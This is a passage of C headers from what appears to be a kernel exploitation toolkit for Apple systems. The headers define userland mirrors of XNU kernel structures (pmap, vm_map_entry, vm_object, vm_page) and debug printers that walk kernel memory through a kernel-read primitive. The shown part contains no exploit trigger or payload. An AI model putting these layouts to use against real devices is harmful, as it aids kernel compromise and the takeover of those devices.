i64 vst_ctime; 79 | i64 vst_ctimensec; 80 | i64 vst_birthtime; 81 | i64 vst_birthtimensec; 82 | i64 vst_size; 83 | i64 vst_blocks; 84 | i32 vst_blksize; 85 | u32 vst_flags; 86 | u32 vst_gen; 87 | u32 vst_rdev; 88 | i64 vst_qspare[2]; 89 | }; 90 | 91 | #define PROC_PIDFDVNODEINFO 1 92 | #define PROC_PIDFDVNODEPATHINFO 2 93 | #define PROC_PIDFDSOCKETINFO 3 94 | #define PROC_PIDFDPSEMINFO 4 95 | #define PROC_PIDFDPSHMINFO 5 96 | #define PROC_PIDFDPIPEINFO 6 97 | #define PROC_PIDFDKQUEUEINFO 7 98 | #define PROC_PIDFDATALKINFO 8 99 | #define PROC_PIDFDKQUEUE_EXTINFO 9 100 | #define PROC_PIDFDCHANNELINFO 10 101 | 102 | struct proc_fileinfo { 103 | u32 fi_openflags; 104 | u32 fi_status; 105 | i64 fi_offset; 106 | i32 fi_type; 107 | u32 fi_guardflags; 108 | }; 109 | 110 | struct psem_info { 111 | struct vinfo_stat psem_stat; 112 | char psem_name[1024]; 113 | }; 114 | 115 | struct psem_fdinfo { 116 | struct proc_fileinfo pfi; 117 | struct psem_info pseminfo; 118 | }; 119 | 120 | #define PROC_PIDDYNKQUEUE_INFO 0 121 | #define PROC_PIDDYNKQUEUE_EXTINFO 1 122 | 123 | struct kqueue_info { 124 | struct vinfo_stat kq_stat; 125 | u32 kq_state; 126 | u32 rfu_1; 127 | }; 128 | 129 | struct kqueue_dyninfo { 130 | struct kqueue_info kqdi_info; 131 | u64 kqdi_servicer; 132 | u64 kqdi_owner; 133 | u32 kqdi_sync_waiters; 134 | u8 kqdi_sync_waiter_qos; 135 | u8 kqdi_async_qos; 136 | u16 kqdi_request_state; 137 | u8 kqdi_events_qos; 138 | u8 kqdi_pri; 139 | u8 kqdi_pol; 140 | u8 kqdi_cpupercent; 141 | u8 _kqdi_reserved0[4]; 142 | u64 _kqdi_reserved1[4]; 143 | }; 144 | 145 | /* 146 | * perfmon stuff 147 | */ 148 | 149 | #define PERFMON_SPEC_MAX_ATTR_COUNT (32) 150 | 151 | struct perfmon_layout { 152 | u16 pl_counter_count; 153 | u16 pl_fixed_offset; 154 | u16 pl_fixed_count; 155 | u16 pl_unit_count; 156 | u16 pl_reg_count; 157 | u16 pl_attr_count; 158 | }; 159 | 160 | typedef char perfmon_name_t[16]; 161 | 162 | struct perfmon_event { 163 | char pe_name[32]; 164 | u64 pe_number; 165 | u16 
pe_counter; 166 | }; 167 | 168 | struct perfmon_attr { 169 | perfmon_name_t pa_name; 170 | u64 pa_value; 171 | }; 172 | 173 | struct perfmon_spec { 174 | struct perfmon_event* ps_events; 175 | struct perfmon_attr* ps_attrs; 176 | u16 ps_event_count; 177 | u16 ps_attr_count; 178 | }; 179 | 180 | enum perfmon_kind { 181 | perfmon_cpmu, 182 | perfmon_upmu, 183 | perfmon_kind_max, 184 | }; 185 | 186 | struct perfmon_source { 187 | const char* ps_name; 188 | const perfmon_name_t* ps_register_names; 189 | const perfmon_name_t* ps_attribute_names; 190 | struct perfmon_layout ps_layout; 191 | enum perfmon_kind ps_kind; 192 | bool ps_supported; 193 | }; 194 | 195 | struct perfmon_counter { 196 | u64 pc_number; 197 | }; 198 | 199 | struct perfmon_config { 200 | struct perfmon_source* pc_source; 201 | struct perfmon_spec pc_spec; 202 | u16 pc_attr_ids[PERFMON_SPEC_MAX_ATTR_COUNT]; 203 | struct perfmon_counter* pc_counters; 204 | u64 pc_counters_used; 205 | u64 pc_attrs_used; 206 | bool pc_configured:1; 207 | }; 208 | 209 | struct perfmon_device { 210 | void* pmdv_copyout_buf; 211 | u64 pmdv_mutex[2]; 212 | struct perfmon_config* pmdv_config; 213 | bool pmdv_allocated; 214 | }; 215 | 216 | enum perfmon_ioctl { 217 | PERFMON_CTL_ADD_EVENT = _IOWR('P', 5, struct perfmon_event), 218 | PERFMON_CTL_SPECIFY = _IOWR('P', 10, struct perfmon_spec), 219 | }; 220 | 221 | /* 222 | * pmap stuff 223 | */ 224 | 225 | #define AP_RWNA (0x0ull << 6) 226 | #define AP_RWRW (0x1ull << 6) 227 | #define AP_RONA (0x2ull << 6) 228 | #define AP_RORO (0x3ull << 6) 229 | 230 | #define ARM_PTE_TYPE 0x0000000000000003ull 231 | #define ARM_PTE_TYPE_VALID 0x0000000000000003ull 232 | #define ARM_PTE_TYPE_MASK 0x0000000000000002ull 233 | #define ARM_TTE_TYPE_L3BLOCK 0x0000000000000002ull 234 | #define ARM_PTE_ATTRINDX 0x000000000000001cull 235 | #define ARM_PTE_NS 0x0000000000000020ull 236 | #define ARM_PTE_AP 0x00000000000000c0ull 237 | #define ARM_PTE_SH 0x0000000000000300ull 238 | #define ARM_PTE_AF 
0x0000000000000400ull 239 | #define ARM_PTE_NG 0x0000000000000800ull 240 | #define ARM_PTE_ZERO1 0x000f000000000000ull 241 | #define ARM_PTE_HINT 0x0010000000000000ull 242 | #define ARM_PTE_PNX 0x0020000000000000ull 243 | #define ARM_PTE_NX 0x0040000000000000ull 244 | #define ARM_PTE_ZERO2 0x0380000000000000ull 245 | #define ARM_PTE_WIRED 0x0400000000000000ull 246 | #define ARM_PTE_WRITEABLE 0x0800000000000000ull 247 | #define ARM_PTE_ZERO3 0x3000000000000000ull 248 | #define ARM_PTE_COMPRESSED_ALT 0x4000000000000000ull 249 | #define ARM_PTE_COMPRESSED 0x8000000000000000ull 250 | 251 | #define ARM_TTE_VALID 0x0000000000000001ull 252 | #define ARM_TTE_TYPE_MASK 0x0000000000000002ull 253 | #define ARM_TTE_TYPE_TABLE 0x0000000000000002ull 254 | #define ARM_TTE_TYPE_BLOCK 0x0000000000000000ull 255 | #define ARM_TTE_TABLE_MASK 0x0000fffffffff000ull 256 | #define ARM_TTE_PA_MASK 0x0000fffffffff000ull 257 | 258 | #define PMAP_TT_L0_LEVEL 0x0 259 | #define PMAP_TT_L1_LEVEL 0x1 260 | #define PMAP_TT_L2_LEVEL 0x2 261 | #define PMAP_TT_L3_LEVEL 0x3 262 | 263 | #define ARM_16K_TT_L0_SIZE 0x0000800000000000ull 264 | #define ARM_16K_TT_L0_OFFMASK 0x00007fffffffffffull 265 | #define ARM_16K_TT_L0_SHIFT 47 266 | #define ARM_16K_TT_L0_INDEX_MASK 0x0000800000000000ull 267 | 268 | #define ARM_16K_TT_L1_SIZE 0x0000001000000000ull 269 | #define ARM_16K_TT_L1_OFFMASK 0x0000000fffffffffull 270 | #define ARM_16K_TT_L1_SHIFT 36 271 | #define ARM_16K_TT_L1_INDEX_MASK 0x00007ff000000000ull 272 | 273 | #define ARM_16K_TT_L2_SIZE 0x0000000002000000ull 274 | #define ARM_16K_TT_L2_OFFMASK 0x0000000001ffffffull 275 | #define ARM_16K_TT_L2_SHIFT 25 276 | #define ARM_16K_TT_L2_INDEX_MASK 0x0000000ffe000000ull 277 | 278 | #define ARM_16K_TT_L3_SIZE 0x0000000000004000ull 279 | #define ARM_16K_TT_L3_OFFMASK 0x0000000000003fffull 280 | #define ARM_16K_TT_L3_SHIFT 14 281 | #define ARM_16K_TT_L3_INDEX_MASK 0x0000000001ffc000ull 282 | 283 | #endif /* miscellaneous_types_h */ 284 | 
-------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/pmap.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef pmap_h 6 | #define pmap_h 7 | 8 | struct pmap { 9 | u64 tte; 10 | u64 ttep; 11 | u64 min; 12 | u64 max; 13 | u64 pmap_pt_attr; 14 | u64 ledger; 15 | u64 rwlock[2]; 16 | struct { 17 | u64 next; 18 | u64 prev; 19 | } pmaps; 20 | u64 tt_entry_free; 21 | u64 nested_pmap; 22 | u64 nested_region_addr; 23 | u64 nested_region_size; 24 | u64 nested_region_true_start; 25 | u64 nested_region_true_end; 26 | u64 nested_region_asid_bitmap; 27 | u32 nested_region_asid_bitmap_size; 28 | u64 reserved0; 29 | u64 reserved1; 30 | u64 reserved2; 31 | u64 reserved3; 32 | i32 ref_count; 33 | i32 nested_count; 34 | u32 nested_no_bounds_refcnt; 35 | u16 hw_asid; 36 | u8 sw_asid; 37 | bool reserved4; 38 | bool pmap_vm_map_cs_enforced; 39 | bool reserved5; 40 | u32 reserved6; 41 | u8 reserved7; 42 | u8 type; 43 | bool reserved8; 44 | bool reserved9; 45 | bool is_rosetta; 46 | bool nx_enabled; 47 | bool is_64bit; 48 | bool nested_has_no_bounds_ref; 49 | bool nested_bounds_set; 50 | bool disable_jop; 51 | bool reserved11; 52 | }; 53 | 54 | void print_pmap(struct kfd* kfd, struct pmap* pmap, u64 pmap_kaddr) 55 | { 56 | print_message("struct pmap @ %016llx", pmap_kaddr); 57 | print_x64(pmap->tte); 58 | print_x64(pmap->ttep); 59 | print_x64(pmap->min); 60 | print_x64(pmap->max); 61 | print_x64(pmap->pmap_pt_attr); 62 | print_x64(pmap->ledger); 63 | print_x64(pmap->rwlock[0]); 64 | print_x64(pmap->rwlock[1]); 65 | print_x64(pmap->pmaps.next); 66 | print_x64(pmap->pmaps.prev); 67 | print_x64(pmap->tt_entry_free); 68 | print_x64(pmap->nested_pmap); 69 | print_x64(pmap->nested_region_addr); 70 | print_x64(pmap->nested_region_size); 71 | print_x64(pmap->nested_region_true_start); 72 | 
print_x64(pmap->nested_region_true_end); 73 | print_x64(pmap->nested_region_asid_bitmap); 74 | print_x32(pmap->nested_region_asid_bitmap_size); 75 | print_x64(pmap->reserved0); 76 | print_x64(pmap->reserved1); 77 | print_x64(pmap->reserved2); 78 | print_x64(pmap->reserved3); 79 | print_i32(pmap->ref_count); 80 | print_i32(pmap->nested_count); 81 | print_x32(pmap->nested_no_bounds_refcnt); 82 | print_x16(pmap->hw_asid); 83 | print_x8(pmap->sw_asid); 84 | print_bool(pmap->reserved4); 85 | print_bool(pmap->pmap_vm_map_cs_enforced); 86 | print_bool(pmap->reserved5); 87 | print_x32(pmap->reserved6); 88 | print_x32(pmap->reserved7); 89 | print_bool(pmap->reserved8); 90 | print_bool(pmap->reserved9); 91 | print_bool(pmap->is_rosetta); 92 | print_bool(pmap->nx_enabled); 93 | print_bool(pmap->is_64bit); 94 | print_bool(pmap->nested_has_no_bounds_ref); 95 | print_bool(pmap->nested_bounds_set); 96 | print_bool(pmap->disable_jop); 97 | print_bool(pmap->reserved11); 98 | print_x8(pmap->type); 99 | } 100 | 101 | #endif /* pmap_h */ 102 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/pseminfo.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef pseminfo_h 6 | #define pseminfo_h 7 | 8 | struct pseminfo { 9 | u32 psem_flags; 10 | u32 psem_usecount; 11 | u16 psem_mode; 12 | u32 psem_uid; 13 | u32 psem_gid; 14 | char psem_name[32]; 15 | u64 psem_semobject; 16 | u64 psem_label; 17 | i32 psem_creator_pid; 18 | u64 psem_creator_uniqueid; 19 | }; 20 | 21 | #endif /* pseminfo_h */ 22 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/psemnode.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef psemnode_h
#define psemnode_h

/*
 * Userland mirror of the kernel's struct psemnode: the fg_data payload of
 * a DTYPE_PSXSEM file. pinfo points at the shared struct pseminfo.
 */
struct psemnode {
    u64 pinfo;
    u64 padding;
};

#endif /* psemnode_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef semaphore_h
#define semaphore_h

/*
 * Userland mirror of the kernel's struct semaphore (the Mach object behind
 * a POSIX semaphore, referenced by pseminfo.psem_semobject). The waitq is
 * kept as an opaque 24-byte blob since this tool does not interpret it.
 */
struct semaphore {
    struct {
        u64 next;
        u64 prev;
    } task_link;        /* link in the owning task's semaphore list */
    char waitq[24];
    u64 owner;          /* owning task */
    u64 port;           /* associated ipc_port, if any */
    u32 ref_count;
    i32 count;          /* current semaphore value */
};

#endif /* semaphore_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef vm_map_copy_h
#define vm_map_copy_h

#include "vm_map_entry.h"

/* Kernel-style aliases for the members of vm_map_copy's c_u union. */
#define cpy_hdr c_u.hdr
#define cpy_object c_u.object
#define cpy_kdata c_u.kdata

/* Red-black tree root holder, mirroring the kernel's RB_HEAD storage. */
struct rb_head {
    u64 rbh_root;
};

/*
 * Userland mirror of the kernel's struct vm_map_header: the doubly linked
 * entry list terminator plus entry count and page metadata. Shared by
 * struct _vm_map and struct vm_map_copy.
 */
struct vm_map_header {
    struct vm_map_links links;
    i32 nentries;
    u16 page_shift;
    u32
        entries_pageable:1,
        __padding:15;
    struct rb_head rb_head_store;
};

/*
 * Userland mirror of the kernel's struct vm_map_copy. Which union member
 * is live depends on type (entry list header, object pointer, or inline
 * kernel data).
 */
struct vm_map_copy {
    i32 type;
    u64 offset;
    u64 size;
    union {
        struct vm_map_header hdr;
        u64 object;
        u64 kdata;
    } c_u;
};

/*
 * Debug helper: dump an already-kread vm_map_copy, then, for an
 * entry-list copy, kread and dump each vm_map_entry on its list.
 * copy_kaddr is the kernel address the struct was read from.
 */
void print_vm_map_copy(struct kfd* kfd, struct vm_map_copy* copy, u64 copy_kaddr)
{
    print_message("struct vm_map_copy @ %016llx", copy_kaddr);
    print_i32(copy->type);
    print_x64(copy->offset);
    print_x64(copy->size);
    print_x64(copy->cpy_hdr.links.prev);
    print_x64(copy->cpy_hdr.links.next);
    print_x64(copy->cpy_hdr.links.start);
    print_x64(copy->cpy_hdr.links.end);
    print_i32(copy->cpy_hdr.nentries);
    print_u16(copy->cpy_hdr.page_shift);
    print_bool(copy->cpy_hdr.entries_pageable);
    print_x64(copy->cpy_hdr.rb_head_store.rbh_root);

    /* type 1 is the entry-list variant (VM_MAP_COPY_ENTRY_LIST in XNU). */
    if (copy->type == 1) {
        u64 entry_kaddr = copy->cpy_hdr.links.next;
        /*
         * The entry list is circular: it terminates back at the links
         * embedded in the copy header itself, whose kernel address is
         * copy_kaddr + offsetof(..., cpy_hdr.links.prev).
         */
        u64 copy_entry_kaddr = copy_kaddr + offsetof(struct vm_map_copy, cpy_hdr.links.prev);
        struct vm_map_entry entry = {};
        while (entry_kaddr != copy_entry_kaddr) {
            kread((u64)(kfd), entry_kaddr, &entry, sizeof(entry));
            print_vm_map_entry(kfd, &entry, entry_kaddr);
            entry_kaddr = entry.vme_next;
        }
    }
}

#endif /* vm_map_copy_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef vm_map_entry_h
#define vm_map_entry_h

#include "vm_object.h"

/* Kernel-style aliases for the embedded vm_map_links members. */
#define vme_prev links.prev
#define vme_next links.next
#define vme_start links.start
#define vme_end links.end

/*
 * Doubly linked list node plus the VA range [start, end) covered by the
 * owning entry. Also embedded in vm_map_header as the list terminator.
 */
struct vm_map_links {
    u64 prev;
    u64 next;
    u64 start;
    u64 end;
};

/* Red-black tree linkage for an entry (mirrors the kernel's RB_ENTRY). */
struct vm_map_store {
    struct {
        u64 rbe_left;
        u64 rbe_right;
        u64 rbe_parent;
    } entry;
};

/*
 * Userland mirror of the kernel's struct vm_map_entry. The anonymous
 * union overlays the packed object/submap pointer encodings; the 64-bit
 * bitfield block must match the kernel's packing exactly — do not
 * reorder or resize any field.
 */
struct vm_map_entry {
    struct vm_map_links links;
    struct vm_map_store store;
    union {
        u64 vme_object_value;
        struct {
            u64 vme_atomic:1;
            u64 is_sub_map:1;
            u64 vme_submap:60;       /* packed submap pointer, see VME_SUBMAP() */
        };
        struct {
            u32 vme_ctx_atomic:1;
            u32 vme_ctx_is_sub_map:1;
            u32 vme_context:30;
            u32 vme_object;          /* packed vm_object pointer, see VME_OBJECT() */
        };
    };
    u64
        vme_alias:12,
        vme_offset:52,               /* page-aligned offset >> 12, see VME_OFFSET() */
        is_shared:1,
        __unused1:1,
        in_transition:1,
        needs_wakeup:1,
        behavior:2,
        needs_copy:1,
        protection:3,
        used_for_tpro:1,
        max_protection:4,
        inheritance:2,
        use_pmap:1,
        no_cache:1,
        vme_permanent:1,
        superpage_size:1,
        map_aligned:1,
        zero_wired_pages:1,
        used_for_jit:1,
        pmap_cs_associated:1,
        iokit_acct:1,
        vme_resilient_codesign:1,
        vme_resilient_media:1,
        __unused2:1,
        vme_no_copy_on_read:1,
        translated_allow_execute:1,
        vme_kernel_object:1;
    u16 wired_count;
    u16 user_wired_count;
};

/*
 * Convert between a vm_map_store address and its enclosing vm_map_entry
 * address: the store sits sizeof(struct vm_map_links) bytes into the
 * entry. vme_for_store additionally clears the low tag bit. Both map a
 * NULL/zero address to itself.
 */
#define vme_for_store(kaddr) ((kaddr) ? (((kaddr) - sizeof(struct vm_map_links)) & (~1ull)) : (kaddr))
#define store_for_vme(kaddr) ((kaddr) ? (((kaddr) + sizeof(struct vm_map_links))) : (kaddr))
(((kaddr) + sizeof(struct vm_map_links))) : (kaddr)) 81 | 82 | static inline u64 VME_SUBMAP(struct vm_map_entry* entry) 83 | { 84 | assert(entry->is_sub_map); 85 | u64 submap_kaddr = (entry->vme_submap << 2) | 0xf000000000000000; 86 | return submap_kaddr; 87 | } 88 | 89 | static inline u64 VME_OBJECT(struct vm_map_entry* entry) 90 | { 91 | assert(!entry->is_sub_map); 92 | assert(!entry->vme_kernel_object); 93 | u64 object_kaddr = VM_OBJECT_UNPACK(entry->vme_object); 94 | return object_kaddr; 95 | } 96 | 97 | static inline u64 VME_OFFSET(struct vm_map_entry* entry) 98 | { 99 | return entry->vme_offset << 12; 100 | } 101 | 102 | void print_vm_map_entry(struct kfd* kfd, struct vm_map_entry* entry, u64 entry_kaddr) 103 | { 104 | print_message("struct vm_map_entry @ %016llx", entry_kaddr); 105 | print_x64(entry->vme_prev); 106 | print_x64(entry->vme_next); 107 | print_x64(entry->vme_start); 108 | print_x64(entry->vme_end); 109 | print_x64(entry->store.entry.rbe_left); 110 | print_x64(entry->store.entry.rbe_right); 111 | print_x64(entry->store.entry.rbe_parent); 112 | print_bool(entry->is_sub_map); 113 | 114 | u64 object_kaddr = 0; 115 | if (!entry->is_sub_map) { 116 | object_kaddr = VME_OBJECT(entry); 117 | print_x64(VME_OBJECT(entry)); 118 | print_x64(VME_OFFSET(entry)); 119 | } 120 | 121 | print_i32(entry->vme_alias); 122 | print_bool(entry->is_shared); 123 | print_bool(entry->in_transition); 124 | print_bool(entry->needs_wakeup); 125 | print_i32(entry->behavior); 126 | print_bool(entry->needs_copy); 127 | print_i32(entry->protection); 128 | print_bool(entry->used_for_tpro); 129 | print_i32(entry->max_protection); 130 | print_i32(entry->inheritance); 131 | print_bool(entry->use_pmap); 132 | print_bool(entry->no_cache); 133 | print_bool(entry->vme_permanent); 134 | print_bool(entry->superpage_size); 135 | print_bool(entry->map_aligned); 136 | print_bool(entry->zero_wired_pages); 137 | print_bool(entry->used_for_jit); 138 | print_bool(entry->pmap_cs_associated); 139 | 
print_bool(entry->iokit_acct); 140 | print_bool(entry->vme_resilient_codesign); 141 | print_bool(entry->vme_resilient_media); 142 | print_bool(entry->vme_no_copy_on_read); 143 | print_bool(entry->translated_allow_execute); 144 | print_bool(entry->vme_kernel_object); 145 | print_u16(entry->wired_count); 146 | print_u16(entry->user_wired_count); 147 | 148 | if (object_kaddr) { 149 | struct vm_object object = {}; 150 | kread((u64)(kfd), object_kaddr, &object, sizeof(object)); 151 | print_vm_object(kfd, &object, object_kaddr); 152 | } 153 | } 154 | 155 | #endif /* vm_map_entry_h */ 156 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_named_entry.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_named_entry_h 6 | #define vm_named_entry_h 7 | 8 | struct vm_named_entry { 9 | u64 Lock[2]; 10 | union { 11 | u64 map; 12 | u64 copy; 13 | } backing; 14 | u64 offset; 15 | u64 size; 16 | u64 data_offset; 17 | u32 18 | protection:4, 19 | is_object:1, 20 | internal:1, 21 | is_sub_map:1, 22 | is_copy:1, 23 | is_fully_owned:1; 24 | }; 25 | 26 | void print_vm_named_entry(struct kfd* kfd, struct vm_named_entry* named_entry, u64 named_entry_kaddr) 27 | { 28 | print_message("struct vm_named_entry @ %016llx", named_entry_kaddr); 29 | print_x64(named_entry->backing.copy); 30 | print_x64(named_entry->offset); 31 | print_x64(named_entry->size); 32 | print_x64(named_entry->data_offset); 33 | print_i32(named_entry->protection); 34 | print_bool(named_entry->is_object); 35 | print_bool(named_entry->internal); 36 | print_bool(named_entry->is_sub_map); 37 | print_bool(named_entry->is_copy); 38 | print_bool(named_entry->is_fully_owned); 39 | 40 | if (!named_entry->is_sub_map) { 41 | u64 copy_kaddr = named_entry->backing.copy; 42 | struct vm_map_copy copy = {}; 43 | kread((u64)(kfd), copy_kaddr, ©, 
sizeof(copy)); 44 | print_vm_map_copy(kfd, ©, copy_kaddr); 45 | } 46 | } 47 | 48 | #endif /* vm_named_entry_h */ 49 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_object.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_object_h 6 | #define vm_object_h 7 | 8 | #include "vm_page.h" 9 | 10 | #define vo_size vo_un1.vou_size 11 | #define vo_cache_pages_to_scan vo_un1.vou_cache_pages_to_scan 12 | #define vo_shadow_offset vo_un2.vou_shadow_offset 13 | #define vo_cache_ts vo_un2.vou_cache_ts 14 | #define vo_owner vo_un2.vou_owner 15 | 16 | struct vm_object { 17 | vm_page_queue_head_t memq; 18 | u64 Lock[2]; 19 | union { 20 | u64 vou_size; 21 | i32 vou_cache_pages_to_scan; 22 | } vo_un1; 23 | u64 memq_hint; 24 | i32 ref_count; 25 | u32 resident_page_count; 26 | u32 wired_page_count; 27 | u32 reusable_page_count; 28 | u64 copy; 29 | u64 shadow; 30 | u64 pager; 31 | union { 32 | u64 vou_shadow_offset; 33 | u64 vou_cache_ts; 34 | u64 vou_owner; 35 | } vo_un2; 36 | u64 paging_offset; 37 | u64 pager_control; 38 | i32 copy_strategy; 39 | u32 40 | paging_in_progress:16, 41 | __object1_unused_bits:16; 42 | u32 activity_in_progress; 43 | u32 44 | all_wanted:11, 45 | pager_created:1, 46 | pager_initialized:1, 47 | pager_ready:1, 48 | pager_trusted:1, 49 | can_persist:1, 50 | internal:1, 51 | private:1, 52 | pageout:1, 53 | alive:1, 54 | purgable:2, 55 | purgeable_only_by_kernel:1, 56 | purgeable_when_ripe:1, 57 | shadowed:1, 58 | true_share:1, 59 | terminating:1, 60 | named:1, 61 | shadow_severed:1, 62 | phys_contiguous:1, 63 | nophyscache:1, 64 | for_realtime:1; 65 | queue_chain_t cached_list; 66 | u64 last_alloc; 67 | u64 cow_hint; 68 | i32 sequential; 69 | u32 pages_created; 70 | u32 pages_used; 71 | u32 72 | wimg_bits:8, 73 | code_signed:1, 74 | transposed:1, 75 | 
mapping_in_progress:1, 76 | phantom_isssd:1, 77 | volatile_empty:1, 78 | volatile_fault:1, 79 | all_reusable:1, 80 | blocked_access:1, 81 | set_cache_attr:1, 82 | object_is_shared_cache:1, 83 | purgeable_queue_type:2, 84 | purgeable_queue_group:3, 85 | io_tracking:1, 86 | no_tag_update:1, 87 | eligible_for_secluded:1, 88 | can_grab_secluded:1, 89 | __unused_access_tracking:1, 90 | vo_ledger_tag:3, 91 | vo_no_footprint:1; 92 | u8 scan_collisions; 93 | u8 __object4_unused_bits[1]; 94 | u16 wire_tag; 95 | u32 phantom_object_id; 96 | queue_head_t uplq; 97 | queue_chain_t objq; 98 | queue_chain_t task_objq; 99 | }; 100 | 101 | void print_vm_object(struct kfd* kfd, struct vm_object* object, u64 object_kaddr) 102 | { 103 | print_message("struct vm_object @ %016llx", object_kaddr); 104 | print_x64(object->vo_size); 105 | print_i32(object->ref_count); 106 | print_u32(object->resident_page_count); 107 | print_u32(object->wired_page_count); 108 | print_u32(object->reusable_page_count); 109 | print_x64(object->copy); 110 | print_x64(object->shadow); 111 | print_x64(object->pager); 112 | print_x64(object->vo_shadow_offset); 113 | print_x64(object->paging_offset); 114 | print_x64(object->pager_control); 115 | print_i32(object->copy_strategy); 116 | print_u32(object->paging_in_progress); 117 | print_u32(object->activity_in_progress); 118 | print_bool(object->can_persist); 119 | print_bool(object->internal); 120 | print_bool(object->pageout); 121 | print_i32(object->purgable); 122 | print_bool(object->shadowed); 123 | print_bool(object->true_share); 124 | print_bool(object->named); 125 | 126 | if (object->resident_page_count) { 127 | u64 page_kaddr = VM_PAGE_UNPACK_PTR(object->memq.next); 128 | struct vm_page page = {}; 129 | while (page_kaddr != object_kaddr) { 130 | kread((u64)(kfd), page_kaddr, &page, sizeof(page)); 131 | print_vm_page(kfd, &page, page_kaddr); 132 | page_kaddr = VM_PAGE_UNPACK_PTR(page.vmp_listq.next); 133 | } 134 | } 135 | } 136 | 137 | #endif /* vm_object_h 
*/ 138 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_page.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_page_h 6 | #define vm_page_h 7 | 8 | typedef struct { 9 | u64 next; 10 | u64 prev; 11 | } queue_head_t, queue_chain_t; 12 | 13 | typedef struct { 14 | u32 next; 15 | u32 prev; 16 | } vm_page_queue_head_t, vm_page_queue_chain_t; 17 | 18 | #define vmp_pageq vmp_q_un.vmp_q_pageq 19 | #define vmp_snext vmp_q_un.vmp_q_snext 20 | 21 | struct vm_page { 22 | union { 23 | vm_page_queue_chain_t vmp_q_pageq; 24 | u64 vmp_q_snext; 25 | } vmp_q_un; 26 | vm_page_queue_chain_t vmp_listq; 27 | vm_page_queue_chain_t vmp_specialq; 28 | u64 vmp_offset; 29 | u32 vmp_object; 30 | u32 31 | vmp_wire_count:16, 32 | vmp_q_state:4, 33 | vmp_on_specialq:2, 34 | vmp_gobbled:1, 35 | vmp_laundry:1, 36 | vmp_no_cache:1, 37 | vmp_private:1, 38 | vmp_reference:1, 39 | vmp_lopage:1, 40 | vmp_realtime:1, 41 | vmp_unused_page_bits:3; 42 | u32 vmp_next_m; 43 | u32 44 | vmp_busy:1, 45 | vmp_wanted:1, 46 | vmp_tabled:1, 47 | vmp_hashed:1, 48 | vmp_fictitious:1, 49 | vmp_clustered:1, 50 | vmp_pmapped:1, 51 | vmp_xpmapped:1, 52 | vmp_wpmapped:1, 53 | vmp_free_when_done:1, 54 | vmp_absent:1, 55 | vmp_error:1, 56 | vmp_dirty:1, 57 | vmp_cleaning:1, 58 | vmp_precious:1, 59 | vmp_overwriting:1, 60 | vmp_restart:1, 61 | vmp_unusual:1, 62 | vmp_cs_validated:4, 63 | vmp_cs_tainted:4, 64 | vmp_cs_nx:4, 65 | vmp_reusable:1, 66 | vmp_written_by_kernel:1; 67 | }; 68 | 69 | struct vm_page* vm_pages = 0; 70 | struct vm_page* vm_page_array_beginning_addr = 0; 71 | struct vm_page* vm_page_array_ending_addr = 0; 72 | u32 vm_first_phys_ppnum = 0; 73 | 74 | #define __WORDSIZE 64 75 | 76 | #define TiB(x) ((0ull + (x)) << 40) 77 | #define GiB(x) ((0ull + (x)) << 30) 78 | 79 | #if TARGET_MACOS 80 | #define 
VM_KERNEL_POINTER_SIGNIFICANT_BITS 41 81 | #define VM_MIN_KERNEL_ADDRESS ((u64)(0ull - TiB(2))) 82 | #else /* TARGET_MACOS */ 83 | #define VM_KERNEL_POINTER_SIGNIFICANT_BITS 38 84 | #define VM_MIN_KERNEL_ADDRESS ((u64)(0ull - GiB(144))) 85 | #endif /* TARGET_MACOS */ 86 | 87 | #define VM_MIN_KERNEL_AND_KEXT_ADDRESS VM_MIN_KERNEL_ADDRESS 88 | 89 | #define VM_PAGE_PACKED_PTR_ALIGNMENT 64 90 | #define VM_PAGE_PACKED_ALIGNED __attribute__((aligned(VM_PAGE_PACKED_PTR_ALIGNMENT))) 91 | #define VM_PAGE_PACKED_PTR_BITS 31 92 | #define VM_PAGE_PACKED_PTR_SHIFT 6 93 | #define VM_PAGE_PACKED_PTR_BASE ((usize)(VM_MIN_KERNEL_AND_KEXT_ADDRESS)) 94 | #define VM_PAGE_PACKED_FROM_ARRAY 0x80000000 95 | 96 | typedef struct vm_packing_params { 97 | u64 vmpp_base; 98 | u8 vmpp_bits; 99 | u8 vmpp_shift; 100 | bool vmpp_base_relative; 101 | } vm_packing_params_t; 102 | 103 | static inline u64 vm_unpack_pointer(u64 packed, vm_packing_params_t params) 104 | { 105 | if (!params.vmpp_base_relative) { 106 | i64 addr = (i64)(packed); 107 | addr <<= __WORDSIZE - params.vmpp_bits; 108 | addr >>= __WORDSIZE - params.vmpp_bits - params.vmpp_shift; 109 | return (u64)(addr); 110 | } 111 | 112 | if (packed) { 113 | return (packed << params.vmpp_shift) + params.vmpp_base; 114 | } 115 | 116 | return (u64)(0); 117 | } 118 | 119 | #define VM_PACKING_IS_BASE_RELATIVE(ns) \ 120 | (ns##_BITS + ns##_SHIFT <= VM_KERNEL_POINTER_SIGNIFICANT_BITS) 121 | 122 | #define VM_PACKING_PARAMS(ns) \ 123 | (vm_packing_params_t) { \ 124 | .vmpp_base = 